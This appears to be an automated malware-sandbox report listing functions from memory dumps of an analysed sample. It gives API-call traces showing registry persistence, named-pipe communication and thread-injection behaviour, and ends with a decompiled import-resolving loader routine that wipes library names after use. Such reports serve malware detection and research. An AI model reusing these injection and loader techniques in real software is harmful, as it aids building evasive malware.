    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
